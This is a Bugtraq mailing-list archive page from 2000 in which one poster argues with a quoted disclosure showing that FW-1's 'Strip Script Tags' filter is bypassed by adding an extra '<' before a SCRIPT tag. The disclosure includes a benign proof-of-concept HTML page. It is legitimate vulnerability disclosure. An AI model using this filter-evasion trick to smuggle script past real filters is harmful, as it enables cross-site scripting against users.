Bugtraq mailing list archives
Re: "Strip Script Tags" in FW-1 can be circumvented
From: jkowall () CINTERACTIVE COM (Jonah Kowall)
Date: Mon, 31 Jan 2000 14:28:29 -0500
I don't consider this a bug in FW-1, but a bug in the products
navigator, and internet explorer. These tags shouldn't be parsed, because
they are malformed. The firewall is stripping tags properly, but since
these tags are malformed you can't expect the firewall to be able to
recognize them as valid tags.
-----Original Message-----
From: Arne Vidstrom [mailto:arne.vidstrom () NTSECURITY NU]
Sent: Saturday, January 29, 2000 8:52 AM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: "Strip Script Tags" in FW-1 can be circumvented
Hi all,
The "Strip Script Tags" in FW-1 can be circumvented by adding an extra <
before the <SCRIPT> tag like in this code:
<HTML>
<HEAD>
<<SCRIPT LANGUAGE="JavaScript">
alert("hello world")
</SCRIPT>
</HEAD>
<BODY>
test
</BODY>
</HTML>
This code will pass unchanged, and still execute in both Navigator and
Explorer. I tried this on version 3.0 of FW-1 (on Windows NT 4.0) but I'm
not able to check it on version 4.0 since I don't have access to it.
/Arne Vidstrom
http://ntsecurity.nu
Current thread:
- Re: "Strip Script Tags" in FW-1 can be circumvented Jonah Kowall (Jan 31)
- Re: "Strip Script Tags" in FW-1 can be circumvented sporty o'one (Feb 01)
- Re: "Strip Script Tags" in FW-1 can be circumvented James Lin (Feb 01)
- Administrivia Elias Levy (Feb 03)
- <Possible follow-ups>
- Re: "Strip Script Tags" in FW-1 can be circumvented Bjørnar B. Larsen (Feb 01)
- Re: "Strip Script Tags" in FW-1 can be circumvented Bret Piatt (Feb 02)
- Re: "Strip Script Tags" in FW-1 can be circumvented Miles Sabin (Feb 01)
- Re: "Strip Script Tags" in FW-1 can be circumvented Losinski, Robert (Feb 01)
- Re: "Strip Script Tags" in FW-1 can be circumvented Arne Vidstrom (Feb 01)
- Re: "Strip Script Tags" in FW-1 can be circumvented Jonah Kowall (Feb 02)